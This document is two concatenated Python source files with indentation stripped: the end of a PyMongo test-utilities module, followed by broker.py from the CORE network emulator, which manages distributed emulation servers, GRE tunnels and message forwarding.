# MongoDB >= 2.0
if 'parsed' in command_line:
parsed = command_line['parsed']
# MongoDB >= 2.6
if 'security' in parsed:
security = parsed['security']
# >= rc3
if 'authorization' in security:
return security['authorization'] == 'enabled'
# < rc3
return security.get('auth', False) or bool(security.get('keyFile'))
return parsed.get('auth', False) or bool(parsed.get('keyFile'))
# Legacy
argv = command_line['argv']
return '--auth' in argv or '--keyFile' in argv
def server_started_with_nojournal(client):
command_line = get_command_line(client)
# MongoDB 2.6.
if 'parsed' in command_line:
parsed = command_line['parsed']
if 'storage' in parsed:
storage = parsed['storage']
if 'journal' in storage:
return not storage['journal']['enabled']
return server_started_with_option(client, '--nojournal', 'nojournal')
def server_is_master_with_slave(client):
command_line = get_command_line(client)
if 'parsed' in command_line:
return command_line['parsed'].get('master', False)
return '--master' in command_line['argv']
def drop_collections(db):
# Drop all non-system collections in this database.
for coll in db.list_collection_names(
filter={"name": {"$regex": r"^(?!system\.)"}}):
db.drop_collection(coll)
def remove_all_users(db):
db.command("dropAllUsersFromDatabase", 1,
writeConcern={"w": client_context.w})
def joinall(threads):
"""Join threads with a 5-minute timeout, assert joins succeeded"""
for t in threads:
t.join(300)
assert not t.isAlive(), "Thread %s hung" % t
def connected(client):
"""Convenience to wait for a newly-constructed client to connect."""
with warnings.catch_warnings():
# Ignore warning that "ismaster" is always routed to primary even
# if client's read preference isn't PRIMARY.
warnings.simplefilter("ignore", UserWarning)
client.admin.command('ismaster') # Force connection.
return client
def wait_until(predicate, success_description, timeout=10):
"""Wait up to 10 seconds (by default) for predicate to be true.
E.g.:
wait_until(lambda: client.primary == ('a', 1),
'connect to the primary')
If the lambda-expression isn't true after 10 seconds, we raise
AssertionError("Didn't ever connect to the primary").
Returns the predicate's first true value.
"""
start = time.time()
while True:
retval = predicate()
if retval:
return retval
if time.time() - start > timeout:
raise AssertionError("Didn't ever %s" % success_description)
time.sleep(0.1)
def is_mongos(client):
res = client.admin.command('ismaster')
return res.get('msg', '') == 'isdbgrid'
def assertRaisesExactly(cls, fn, *args, **kwargs):
"""
Unlike the standard assertRaises, this checks that a function raises a
specific class of exception, and not a subclass. E.g., check that
MongoClient() raises ConnectionFailure but not its subclass, AutoReconnect.
"""
try:
fn(*args, **kwargs)
except Exception as e:
assert e.__class__ == cls, "got %s, expected %s" % (
e.__class__.__name__, cls.__name__)
else:
raise AssertionError("%s not raised" % cls)
@contextlib.contextmanager
def _ignore_deprecations():
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
yield
def ignore_deprecations(wrapped=None):
"""A context manager or a decorator."""
if wrapped:
@functools.wraps(wrapped)
def wrapper(*args, **kwargs):
with _ignore_deprecations():
return wrapped(*args, **kwargs)
return wrapper
else:
return _ignore_deprecations()
class DeprecationFilter(object):
def __init__(self, action="ignore"):
"""Start filtering deprecations."""
self.warn_context = warnings.catch_warnings()
self.warn_context.__enter__()
warnings.simplefilter(action, DeprecationWarning)
def stop(self):
"""Stop filtering deprecations."""
self.warn_context.__exit__()
self.warn_context = None
def get_pool(client):
"""Get the standalone, primary, or mongos pool."""
topology = client._get_topology()
server = topology.select_server(writable_server_selector)
return server.pool
def get_pools(client):
"""Get all pools."""
return [
server.pool for server in
client._get_topology().select_servers(any_server_selector)]
# Constants for run_threads and lazy_client_trial.
NTRIALS = 5
NTHREADS = 10
def run_threads(collection, target):
"""Run a target function in many threads.
target is a function taking a Collection and an integer.
"""
threads = []
for i in range(NTHREADS):
bound_target = partial(target, collection, i)
threads.append(threading.Thread(target=bound_target))
for t in threads:
t.start()
for t in threads:
t.join(60)
assert not t.isAlive()
@contextlib.contextmanager
def frequent_thread_switches():
"""Make concurrency bugs more likely to manifest."""
interval = None
if not sys.platform.startswith('java'):
if hasattr(sys, 'getswitchinterval'):
interval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
else:
interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
yield
finally:
if not sys.platform.startswith('java'):
if hasattr(sys, 'setswitchinterval'):
sys.setswitchinterval(interval)
else:
sys.setcheckinterval(interval)
def lazy_client_trial(reset, target, test, get_client):
"""Test concurrent operations on a lazily-connecting client.
`reset` takes a collection and resets it for the next trial.
`target` takes a lazily-connecting collection and an index from
0 to NTHREADS, and performs some operation, e.g. an insert.
`test` takes the lazily-connecting collection and asserts a
post-condition to prove `target` succeeded.
"""
collection = client_context.client.pymongo_test.test
with frequent_thread_switches():
for i in range(NTRIALS):
reset(collection)
lazy_client = get_client()
lazy_collection = lazy_client.pymongo_test.test
run_threads(lazy_collection, target)
test(lazy_collection)
def gevent_monkey_patched():
"""Check if gevent's monkey patching is active."""
# In Python 3.6 importing gevent.socket raises an ImportWarning.
with warnings.catch_warnings():
warnings.simplefilter("ignore", ImportWarning)
try:
import socket
import gevent.socket
return socket.socket is gevent.socket.socket
except ImportError:
return False
def eventlet_monkey_patched():
"""Check if eventlet's monkey patching is active."""
try:
import threading
import eventlet
return (threading.current_thread.__module__ ==
'eventlet.green.threading')
except ImportError:
return False
def is_greenthread_patched():
return gevent_monkey_patched() or eventlet_monkey_patched()
def disable_replication(client):
"""Disable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='alwaysOn')
def enable_replication(client):
"""Enable replication on all secondaries, requires MongoDB 3.2."""
for host, port in client.secondaries:
secondary = single_client(host, port)
secondary.admin.command('configureFailPoint', 'stopReplProducer',
mode='off')
class ExceptionCatchingThread(threading.Thread):
"""A thread that stores any exception encountered from run()."""
def __init__(self, *args, **kwargs):
self.exc = None
super(ExceptionCatchingThread, self).__init__(*args, **kwargs)
def run(self):
try:
super(ExceptionCatchingThread, self).run()
except BaseException as exc:
self.exc = exc
raise
|
broker.py
|
"""
Broker class that is part of the session object. Handles distributing parts of the emulation out to
other emulation servers. The broker is consulted when handling messages to determine if messages
should be handled locally or forwarded on to another emulation server.
"""
import logging
import os
import select
import socket
import threading
from core import utils
from core.api.tlv import coreapi
from core.nodes.base import CoreNodeBase, CoreNetworkBase
from core.emulator.enumerations import ConfigDataTypes
from core.emulator.enumerations import ConfigFlags
from core.emulator.enumerations import ConfigTlvs
from core.emulator.enumerations import EventTlvs
from core.emulator.enumerations import EventTypes
from core.emulator.enumerations import ExecuteTlvs
from core.emulator.enumerations import FileTlvs
from core.emulator.enumerations import LinkTlvs
from core.emulator.enumerations import MessageFlags
from core.emulator.enumerations import MessageTypes
from core.emulator.enumerations import NodeTlvs
from core.emulator.enumerations import NodeTypes
from core.emulator.enumerations import RegisterTlvs
from core.nodes import nodeutils
from core.nodes.ipaddress import IpAddress
from core.nodes.interface import GreTap
from core.nodes.network import GreTapBridge
from core.nodes.physical import PhysicalNode
class CoreDistributedServer(object):
"""
Represents CORE daemon servers for communication.
"""
def __init__(self, name, host, port):
"""
Creates a CoreServer instance.
:param str name: name of the CORE server
:param str host: server address
:param int port: server port
"""
self.name = name
self.host = host
self.port = port
self.sock = None
self.instantiation_complete = False
def connect(self):
"""
Connect to CORE server and save connection.
:return: nothing
"""
if self.sock:
raise ValueError("socket already connected")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((self.host, self.port))
except IOError as e:
sock.close()
raise e
self.sock = sock
def close(self):
"""
Close connection with CORE server.
:return: nothing
"""
if self.sock is not None:
self.sock.close()
self.sock = None
class CoreBroker(object):
"""
Helps with brokering messages between CORE daemon servers.
"""
# configurable manager name
name = "broker"
# configurable manager type
config_type = RegisterTlvs.UTILITY.value
def __init__(self, session):
"""
Creates a CoreBroker instance.
:param core.emulator.session.Session session: session this manager is tied to
:return: nothing
"""
# ConfigurableManager.__init__(self)
self.session = session
self.session_clients = []
self.session_id_master = None
self.myip = None
# dict containing tuples of (host, port, sock)
self.servers = {}
self.servers_lock = threading.Lock()
self.addserver("localhost", None, None)
# dict containing node number to server name mapping
self.nodemap = {}
# this lock also protects self.nodecounts
self.nodemap_lock = threading.Lock()
# reference counts of nodes on servers
self.nodecounts = {}
# set of node numbers that are link-layer nodes (networks)
self.network_nodes = set()
# set of node numbers that are PhysicalNode nodes
self.physical_nodes = set()
# allows for other message handlers to process API messages (e.g. EMANE)
self.handlers = set()
# dict with tunnel key to tunnel device mapping
self.tunnels = {}
self.dorecvloop = False
self.recvthread = None
self.bootcount = 0
def startup(self):
"""
Build tunnels between network-layer nodes now that all node
and link information has been received; called when session
enters the instantation state.
"""
self.addnettunnels()
self.writeservers()
def shutdown(self):
"""
Close all active sockets; called when the session enters the
data collect state
"""
self.reset()
with self.servers_lock:
while len(self.servers) > 0:
name, server = self.servers.popitem()
if server.sock is not None:
logging.info("closing connection with %s: %s:%s", name, server.host, server.port)
server.close()
self.dorecvloop = False
if self.recvthread is not None:
self.recvthread.join()
def reset(self):
"""
Reset to initial state.
"""
logging.info("clearing state")
self.nodemap_lock.acquire()
self.nodemap.clear()
for server in self.nodecounts:
count = self.nodecounts[server]
if count < 1:
self.delserver(server)
self.nodecounts.clear()
self.bootcount = 0
self.nodemap_lock.release()
self.network_nodes.clear()
self.physical_nodes.clear()
while len(self.tunnels) > 0:
_key, gt = self.tunnels.popitem()
gt.shutdown()
def startrecvloop(self):
"""
Spawn the receive loop for receiving messages.
"""
if self.recvthread is not None:
logging.info("server receive loop already started")
if self.recvthread.isAlive():
return
else:
self.recvthread.join()
# start reading data from connected sockets
logging.info("starting server receive loop")
self.dorecvloop = True
self.recvthread = threading.Thread(target=self.recvloop)
self.recvthread.daemon = True
self.recvthread.start()
def recvloop(self):
"""
Receive loop for receiving messages from server sockets.
"""
self.dorecvloop = True
# note: this loop continues after emulation is stopped,
# even with 0 servers
while self.dorecvloop:
rlist = []
with self.servers_lock:
# build a socket list for select call
for name in self.servers:
server = self.servers[name]
if server.sock is not None:
rlist.append(server.sock)
r, _w, _x = select.select(rlist, [], [], 1.0)
for sock in r:
server = self.getserverbysock(sock)
logging.info("attempting to receive from server: peer:%s remote:%s",
server.sock.getpeername(), server.sock.getsockname())
if server is None:
# servers may have changed; loop again
continue
rcvlen = self.recv(server)
if rcvlen == 0:
logging.info("connection with server(%s) closed: %s:%s", server.name, server.host, server.port)
def recv(self, server):
"""
Receive data on an emulation server socket and broadcast it to
all connected session handlers. Returns the length of data recevied
and forwarded. Return value of zero indicates the socket has closed
and should be removed from the self.servers dict.
:param CoreDistributedServer server: server to receive from
:return: message length
:rtype: int
"""
msghdr = server.sock.recv(coreapi.CoreMessage.header_len)
if len(msghdr) == 0:
# server disconnected
logging.info("server disconnected, closing server")
server.close()
return 0
if len(msghdr) != coreapi.CoreMessage.header_len:
logging.warning("warning: broker received not enough data len=%s", len(msghdr))
return len(msghdr)
msgtype, msgflags, msglen = coreapi.CoreMessage.unpack_header(msghdr)
msgdata = server.sock.recv(msglen)
data = msghdr + msgdata
count = None
logging.debug("received message type: %s", MessageTypes(msgtype))
# snoop exec response for remote interactive TTYs
if msgtype == MessageTypes.EXECUTE.value and msgflags & MessageFlags.TTY.value:
data = self.fixupremotetty(msghdr, msgdata, server.host)
logging.debug("created remote tty message: %s", data)
elif msgtype == MessageTypes.NODE.value:
# snoop node delete response to decrement node counts
if msgflags & MessageFlags.DELETE.value:
msg = coreapi.CoreNodeMessage(msgflags, msghdr, msgdata)
nodenum = msg.get_tlv(NodeTlvs.NUMBER.value)
if nodenum is not None:
count = self.delnodemap(server, nodenum)
elif msgtype == MessageTypes.LINK.value:
# this allows green link lines for remote WLANs
msg = coreapi.CoreLinkMessage(msgflags, msghdr, msgdata)
self.session.sdt.handle_distributed(msg)
elif msgtype == MessageTypes.EVENT.value:
msg = coreapi.CoreEventMessage(msgflags, msghdr, msgdata)
eventtype = msg.get_tlv(EventTlvs.TYPE.value)
if eventtype == EventTypes.INSTANTIATION_COMPLETE.value:
server.instantiation_complete = True
if self.instantiation_complete():
self.session.check_runtime()
else:
logging.error("unknown message type received: %s", msgtype)
try:
for session_client in self.session_clients:
session_client.sendall(data)
except IOError:
logging.exception("error sending message")
if count is not None and count < 1:
return 0
else:
return len(data)
def addserver(self, name, host, port):
"""
Add a new server, and try to connect to it. If we"re already connected to this
(host, port), then leave it alone. When host,port is None, do not try to connect.
:param str name: name of server
:param str host: server address
:param int port: server port
:return: nothing
"""
with self.servers_lock:
server = self.servers.get(name)
if server is not None:
if host == server.host and port == server.port and server.sock is not None:
# leave this socket connected
return
logging.info("closing connection with %s @ %s:%s", name, server.host, server.port)
server.close()
del self.servers[name]
logging.info("adding broker server(%s): %s:%s", name, host, port)
server = CoreDistributedServer(name, host, port)
if host is not None and port is not None:
try:
server.connect()
except IOError:
logging.exception("error connecting to server(%s): %s:%s", name, host, port)
if server.sock is not None:
self.startrecvloop()
self.servers[name] = server
def delserver(self, server):
"""
Remove a server and hang up any connection.
:param CoreDistributedServer server: server to delete
:return: nothing
"""
with self.servers_lock:
try:
s = self.servers.pop(server.name)
if s != server:
raise ValueError("server removed was not the server provided")
except KeyError:
logging.exception("error deleting server")
if server.sock is not None:
logging.info("closing connection with %s @ %s:%s", server.name, server.host, server.port)
server.close()
def getserverbyname(self, name):
"""
Return the server object having the given name, or None.
:param str name: name of server to retrieve
:return: server for given name
:rtype: CoreDistributedServer
"""
with self.servers_lock:
return self.servers.get(name)
def getserverbysock(self, sock):
"""
Return the server object corresponding to the given socket, or None.
:param sock: socket associated with a server
:return: core server associated wit the socket
:rtype: CoreDistributedServer
"""
with self.servers_lock:
for name in self.servers:
server = self.servers[name]
if server.sock == sock:
return server
return None
def getservers(self):
"""
Return a list of servers sorted by name.
:return: sorted server list
:rtype: list
"""
with self.servers_lock:
return sorted(self.servers.values(), key=lambda x: x.name)
def getservernames(self):
"""
Return a sorted list of server names (keys from self.servers).
:return: sorted server names
:rtype: list
"""
with self.servers_lock:
return sorted(self.servers.keys())
def tunnelkey(self, n1num, n2num):
"""
Compute a 32-bit key used to uniquely identify a GRE tunnel.
The hash(n1num), hash(n2num) values are used, so node numbers may be
None or string values (used for e.g. "ctrlnet").
:param int n1num: node one id
:param int n2num: node two id
:return: tunnel key for the node pair
:rtype: int
"""
logging.debug("creating tunnel key for: %s, %s", n1num, n2num)
sid = self.session_id_master
if sid is None:
# this is the master session
sid = self.session.id
key = (sid << 16) ^ utils.hashkey(n1num) ^ (utils.hashkey(n2num) << 8)
return key & 0xFFFFFFFF
def addtunnel(self, remoteip, n1num, n2num, localnum):
"""
Adds a new GreTapBridge between nodes on two different machines.
:param str remoteip: remote address for tunnel
:param int n1num: node one id
:param int n2num: node two id
:param int localnum: local id
:return: nothing
"""
key = self.tunnelkey(n1num, n2num)
if localnum == n2num:
remotenum = n1num
else:
remotenum = n2num
if key in self.tunnels.keys():
logging.warning("tunnel with key %s (%s-%s) already exists!", key, n1num, n2num)
else:
_id = key & ((1 << 16) - 1)
logging.info("adding tunnel for %s-%s to %s with key %s", n1num, n2num, remoteip, key)
if localnum in self.physical_nodes:
# no bridge is needed on physical nodes; use the GreTap directly
gt = GreTap(node=None, name=None, session=self.session,
remoteip=remoteip, key=key)
else:
gt = self.session.create_node(cls=GreTapBridge, _id=_id, policy="ACCEPT", remoteip=remoteip, key=key)
gt.localnum = localnum
gt.remotenum = remotenum
self.tunnels[key] = gt
def addnettunnels(self):
"""
Add GreTaps between network devices on different machines.
The GreTapBridge is not used since that would add an extra bridge.
"""
logging.debug("adding network tunnels for nodes: %s", self.network_nodes)
for n in self.network_nodes:
self.addnettunnel(n)
def addnettunnel(self, node_id):
"""
Add network tunnel between node and broker.
:param int node_id: node id of network to add tunnel to
:return: list of gre taps
:rtype: list
"""
try:
net = self.session.get_node(node_id)
logging.info("adding net tunnel for: id(%s) %s", node_id, net)
except KeyError:
raise KeyError("network node %s not found" % node_id)
# add other nets here that do not require tunnels
if nodeutils.is_node(net, NodeTypes.EMANE_NET):
logging.warning("emane network does not require a tunnel")
return None
server_interface = getattr(net, "serverintf", None)
if nodeutils.is_node(net, NodeTypes.CONTROL_NET) and server_interface is not None:
logging.warning("control networks with server interfaces do not need a tunnel")
return None
servers = self.getserversbynode(node_id)
if len(servers) < 2:
logging.warning("not enough servers to create a tunnel: %s", servers)
return None
hosts = []
for server in servers:
if server.host is None:
continue
logging.info("adding server host for net tunnel: %s", server.host)
hosts.append(server.host)
if len(hosts) == 0:
for session_client in self.session_clients:
# get IP address from API message sender (master)
if session_client.client_address != "":
address = session_client.client_address[0]
logging.info("adding session_client host: %s", address)
hosts.append(address)
r = []
for host in hosts:
if self.myip:
# we are the remote emulation server
myip = self.myip
else:
# we are the session master
myip = host
key = self.tunnelkey(node_id, IpAddress.to_int(myip))
if key in self.tunnels.keys():
logging.info("tunnel already exists, returning existing tunnel: %s", key)
gt = self.tunnels[key]
r.append(gt)
continue
logging.info("adding tunnel for net %s to %s with key %s", node_id, host, key)
gt = GreTap(node=None, name=None, session=self.session, remoteip=host, key=key)
self.tunnels[key] = gt
r.append(gt)
# attaching to net will later allow gt to be destroyed
# during net.shutdown()
net.attach(gt)
return r
def deltunnel(self, n1num, n2num):
"""
Delete tunnel between nodes.
:param int n1num: node one id
:param int n2num: node two id
:return: nothing
"""
key = self.tunnelkey(n1num, n2num)
try:
logging.info("deleting tunnel between %s - %s with key: %s", n1num, n2num, key)
gt = self.tunnels.pop(key)
except KeyError:
gt = None
if gt:
self.session.delete_node(gt.id)
del gt
def gettunnel(self, n1num, n2num):
"""
Return the GreTap between two nodes if it exists.
:param int n1num: node one id
:param int n2num: node two id
:return: gre tap between nodes or none
"""
key = self.tunnelkey(n1num, n2num)
logging.debug("checking for tunnel(%s) in: %s", key, self.tunnels.keys())
if key in self.tunnels.keys():
return self.tunnels[key]
else:
return None
def addnodemap(self, server, nodenum):
"""
Record a node number to emulation server mapping.
:param CoreDistributedServer server: core server to associate node with
:param int nodenum: node id
:return: nothing
"""
with self.nodemap_lock:
if nodenum in self.nodemap:
if server in self.nodemap[nodenum]:
return
self.nodemap[nodenum].add(server)
else:
self.nodemap[nodenum] = {server}
if server in self.nodecounts:
self.nodecounts[server] += 1
else:
self.nodecounts[server] = 1
def delnodemap(self, server, nodenum):
"""
Remove a node number to emulation server mapping.
Return the number of nodes left on this server.
:param CoreDistributedServer server: server to remove from node map
:param int nodenum: node id
:return: number of nodes left on server
:rtype: int
"""
count = None
with self.nodemap_lock:
if nodenum not in self.nodemap:
return count
self.nodemap[nodenum].remove(server)
if server in self.nodecounts:
count = self.nodecounts[server]
count -= 1
self.nodecounts[server] = count
return count
def getserversbynode(self, nodenum):
"""
Retrieve a set of emulation servers given a node number.
:param int nodenum: node id
:return: core server associated with node
:rtype: set
"""
with self.nodemap_lock:
if nodenum not in self.nodemap:
return set()
return self.nodemap[nodenum]
def addnet(self, nodenum):
"""
Add a node number to the list of link-layer nodes.
:param int nodenum: node id to add
:return: nothing
"""
logging.info("adding net to broker: %s", nodenum)
self.network_nodes.add(nodenum)
logging.info("broker network nodes: %s", self.network_nodes)
def addphys(self, nodenum):
"""
Add a node number to the list of physical nodes.
:param int nodenum: node id to add
:return: nothing
"""
self.physical_nodes.add(nodenum)
def handle_message(self, message):
"""
Handle an API message. Determine whether this needs to be handled
by the local server or forwarded on to another one.
Returns True when message does not need to be handled locally,
and performs forwarding if required.
Returning False indicates this message should be handled locally.
:param core.api.coreapi.CoreMessage message: message to handle
:return: true or false for handling locally
:rtype: bool
"""
servers = set()
handle_locally = False
# Do not forward messages when in definition state
# (for e.g. configuring services)
if self.session.state == EventTypes.DEFINITION_STATE.value:
return False
# Decide whether message should be handled locally or forwarded, or both
if message.message_type == MessageTypes.NODE.value:
handle_locally, servers = self.handlenodemsg(message)
elif message.message_type == MessageTypes.EVENT.value:
# broadcast events everywhere
servers = self.getservers()
elif message.message_type == MessageTypes.CONFIG.value:
# broadcast location and services configuration everywhere
confobj = message.get_tlv(ConfigTlvs.OBJECT.value)
if confobj == "location" or confobj == "services" or confobj == "session" or confobj == "all":
servers = self.getservers()
elif message.message_type == MessageTypes.FILE.value:
# broadcast hook scripts and custom service files everywhere
filetype = message.get_tlv(FileTlvs.TYPE.value)
if filetype is not None and (filetype[:5] == "hook:" or filetype[:8] == "service:"):
servers = self.getservers()
if message.message_type == MessageTypes.LINK.value:
# prepare a server list from two node numbers in link message
handle_locally, servers, message = self.handlelinkmsg(message)
elif len(servers) == 0:
# check for servers based on node numbers in all messages but link
nn = message.node_numbers()
if len(nn) == 0:
return False
servers = self.getserversbynode(nn[0])
# allow other handlers to process this message (this is used
# by e.g. EMANE to use the link add message to keep counts of
# interfaces on other servers)
for handler in self.handlers:
handler(message)
# perform any message forwarding
handle_locally |= self.forwardmsg(message, servers)
return not handle_locally
def setupserver(self, servername):
"""
Send the appropriate API messages for configuring the specified emulation server.
:param str servername: name of server to configure
:return: nothing
"""
server = self.getserverbyname(servername)
if server is None:
logging.warning("ignoring unknown server: %s", servername)
return
if server.sock is None or server.host is None or server.port is None:
logging.info("ignoring disconnected server: %s", servername)
return
# communicate this session"s current state to the server
tlvdata = coreapi.CoreEventTlv.pack(EventTlvs.TYPE.value, self.session.state)
msg = coreapi.CoreEventMessage.pack(0, tlvdata)
server.sock.send(msg)
# send a Configuration message for the broker object and inform the
# server of its local name
tlvdata = b""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "broker")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, ConfigFlags.UPDATE.value)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.DATA_TYPES.value, (ConfigDataTypes.STRING.value,))
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value,
"%s:%s:%s" % (server.name, server.host, server.port))
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.SESSION.value, "%s" % self.session.id)
msg = coreapi.CoreConfMessage.pack(0, tlvdata)
server.sock.send(msg)
@staticmethod
def fixupremotetty(msghdr, msgdata, host):
"""
When an interactive TTY request comes from the GUI, snoop the reply
and add an SSH command to the appropriate remote server.
:param msghdr: message header
:param msgdata: message data
:param str host: host address
:return: packed core execute tlv data
"""
msgtype, msgflags, _msglen = coreapi.CoreMessage.unpack_header(msghdr)
msgcls = coreapi.CLASS_MAP[msgtype]
msg = msgcls(msgflags, msghdr, msgdata)
nodenum = msg.get_tlv(ExecuteTlvs.NODE.value)
execnum = msg.get_tlv(ExecuteTlvs.NUMBER.value)
cmd = msg.get_tlv(ExecuteTlvs.COMMAND.value)
res = msg.get_tlv(ExecuteTlvs.RESULT.value)
tlvdata = b""
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.NODE.value, nodenum)
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.NUMBER.value, execnum)
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.COMMAND.value, cmd)
res = "ssh -X -f " + host + " xterm -e " + res
tlvdata += coreapi.CoreExecuteTlv.pack(ExecuteTlvs.RESULT.value, res)
return coreapi.CoreExecMessage.pack(msgflags, tlvdata)
def handlenodemsg(self, message):
"""
Determine and return the servers to which this node message should
be forwarded. Also keep track of link-layer nodes and the mapping of
nodes to servers.
:param core.api.coreapi.CoreMessage message: message to handle
:return: boolean for handling locally and set of servers
:rtype: tuple
"""
servers = set()
handle_locally = False
serverfiletxt = None
# snoop Node Message for emulation server TLV and record mapping
n = message.tlv_data[NodeTlvs.NUMBER.value]
# replicate link-layer nodes on all servers
nodetype = message.get_tlv(NodeTlvs.TYPE.value)
if nodetype is not None:
try:
nodecls = nodeutils.get_node_class(NodeTypes(nodetype))
except KeyError:
logging.warning("broker invalid node type %s", nodetype)
return handle_locally, servers
if nodecls is None:
logging.warning("broker unimplemented node type %s", nodetype)
return handle_locally, servers
if issubclass(nodecls, CoreNetworkBase) and nodetype != NodeTypes.WIRELESS_LAN.value:
# network node replicated on all servers; could be optimized
# don"t replicate WLANs, because ebtables rules won"t work
servers = self.getservers()
handle_locally = True
self.addnet(n)
for server in servers:
self.addnodemap(server, n)
# do not record server name for networks since network
# nodes are replicated across all server
return handle_locally, servers
elif issubclass(nodecls, CoreNodeBase):
name = message.get_tlv(NodeTlvs.NAME.value)
if name:
serverfiletxt = "%s %s %s" % (n, name, nodecls)
if issubclass(nodecls, PhysicalNode):
# remember physical nodes
self.addphys(n)
# emulation server TLV specifies server
servername = message.get_tlv(NodeTlvs.EMULATION_SERVER.value)
server = self.getserverbyname(servername)
if server is not None:
self.addnodemap(server, n)
if server not in servers:
servers.add(server)
if serverfiletxt and self.session.master:
self.writenodeserver(serverfiletxt, server)
# hook to update coordinates of physical nodes
if n in self.physical_nodes:
self.session.mobility.physnodeupdateposition(message)
return handle_locally, servers
def handlelinkmsg(self, message):
"""
Determine and return the servers to which this link message should
be forwarded. Also build tunnels between different servers or add
opaque data to the link message before forwarding.
:param core.api.coreapi.CoreMessage message: message to handle
:return: boolean to handle locally, a set of server, and message
:rtype: tuple
"""
servers = set()
handle_locally = False
# determine link message destination using non-network nodes
nn = message.node_numbers()
logging.debug("checking link nodes (%s) with network nodes (%s)", nn, self.network_nodes)
if nn[0] in self.network_nodes:
if nn[1] in self.network_nodes:
# two network nodes linked together - prevent loops caused by
# the automatic tunnelling
handle_locally = True
else:
servers = self.getserversbynode(nn[1])
elif nn[1] in self.network_nodes:
servers = self.getserversbynode(nn[0])
else:
logging.debug("link nodes are not network nodes")
servers1 = self.getserversbynode(nn[0])
logging.debug("servers for node(%s): %s", nn[0], servers1)
servers2 = self.getserversbynode(nn[1])
logging.debug("servers for node(%s): %s", nn[1], servers2)
# nodes are on two different servers, build tunnels as needed
if servers1 != servers2:
localn = None
if len(servers1) == 0 or len(servers2) == 0:
handle_locally = True
servers = servers1.union(servers2)
host = None
# get the IP of remote server and decide which node number
# is for a local node
for server in servers:
host = server.host
if host is None:
# server is local
handle_locally = True
if server in servers1:
localn = nn[0]
else:
localn = nn[1]
if handle_locally and localn is None:
# having no local node at this point indicates local node is
# the one with the empty server set
if len(servers1) == 0:
localn = nn[0]
elif len(servers2) == 0:
localn = nn[1]
if host is None:
host = self.getlinkendpoint(message, localn == nn[0])
logging.debug("handle locally(%s) and local node(%s)", handle_locally, localn)
if localn is None:
message = self.addlinkendpoints(message, servers1, servers2)
elif message.flags & MessageFlags.ADD.value:
self.addtunnel(host, nn[0], nn[1], localn)
elif message.flags & MessageFlags.DELETE.value:
self.deltunnel(nn[0], nn[1])
handle_locally = False
else:
servers = servers1.union(servers2)
return handle_locally, servers, message
def addlinkendpoints(self, message, servers1, servers2):
"""
For a link message that is not handled locally, inform the remote
servers of the IP addresses used as tunnel endpoints by adding
opaque data to the link message.
:param core.api.coreapi.CoreMessage message: message to link end points
:param servers1:
:param servers2:
:return: core link message
:rtype: coreapi.CoreLinkMessage
"""
ip1 = ""
for server in servers1:
if server.host is not None:
ip1 = server.host
break
ip2 = ""
for server in servers2:
if server.host is not None:
ip2 = server.host
break
tlvdata = message.raw_message[coreapi.CoreMessage.header_len:]
tlvdata += coreapi.CoreLinkTlv.pack(LinkTlvs.OPAQUE.value, "%s:%s" % (ip1, ip2))
newraw = coreapi.CoreLinkMessage.pack(message.flags, tlvdata)
msghdr = newraw[:coreapi.CoreMessage.header_len]
return coreapi.CoreLinkMessage(message.flags, msghdr, tlvdata)
def getlinkendpoint(self, msg, first_is_local):
"""
A link message between two different servers has been received,
and we need to determine the tunnel endpoint. First look for
opaque data in the link message, otherwise use the IP of the message
sender (the master server).
:param core.api.tlv.coreapi.CoreLinkMessage msg: link message
:param bool first_is_local: is first local
:return: host address
:rtype: str
"""
host = None
opaque = msg.get_tlv(LinkTlvs.OPAQUE.value)
if opaque is not None:
if first_is_local:
host = opaque.split(":")[1]
else:
host = opaque.split(":")[0]
if host == "":
host = None
if host is None:
for session_client in self.session_clients:
# get IP address from API message sender (master)
if session_client.client_address != "":
host = session_client.client_address[0]
break
return host
def handlerawmsg(self, msg):
"""
Helper to invoke message handler, using raw (packed) message bytes.
:param msg: raw message butes
:return: should handle locally or not
:rtype: bool
"""
hdr = msg[:coreapi.CoreMessage.header_len]
msgtype, flags, _msglen = coreapi.CoreMessage.unpack_header(hdr)
msgcls = coreapi.CLASS_MAP[msgtype]
return self.handle_message(msgcls(flags, hdr, msg[coreapi.CoreMessage.header_len:]))
def forwardmsg(self, message, servers):
"""
Forward API message to all given servers.
Return True if an empty host/port is encountered, indicating
the message should be handled locally.
:param core.api.coreapi.CoreMessage message: message to forward
:param list servers: server to forward message to
:return: handle locally value
:rtype: bool
"""
handle_locally = len(servers) == 0
for server in servers:
if server.host is None and server.port is None:
# local emulation server, handle this locally
handle_locally = True
elif server.sock is None:
logging.info("server %s @ %s:%s is disconnected", server.name, server.host, server.port)
else:
logging.info("forwarding message to server(%s): %s:%s", server.name, server.host, server.port)
logging.debug("message being forwarded:\n%s", message)
server.sock.send(message.raw_message)
return handle_locally
def writeservers(self):
"""
Write the server list to a text file in the session directory upon
startup: /tmp/pycore.nnnnn/servers
:return: nothing
"""
servers = self.getservers()
filename = os.path.join(self.session.session_dir, "servers")
master = self.session_id_master
if master is None:
master = self.session.id
try:
with open(filename, "w") as f:
f.write("master=%s\n" % master)
for server in servers:
if server.name == "localhost":
continue
lhost, lport = None, None
if server.sock:
lhost, lport = server.sock.getsockname()
f.write("%s %s %s %s %s\n" % (server.name, server.host, server.port, lhost, lport))
except IOError:
logging.exception("error writing server list to the file: %s", filename)
def writenodeserver(self, nodestr, server):
"""
Creates a /tmp/pycore.nnnnn/nX.conf/server file having the node
and server info. This may be used by scripts for accessing nodes on
other machines, much like local nodes may be accessed via the
VnodeClient class.
:param str nodestr: node string
:param CoreDistributedServer server: core server
:return: nothing
"""
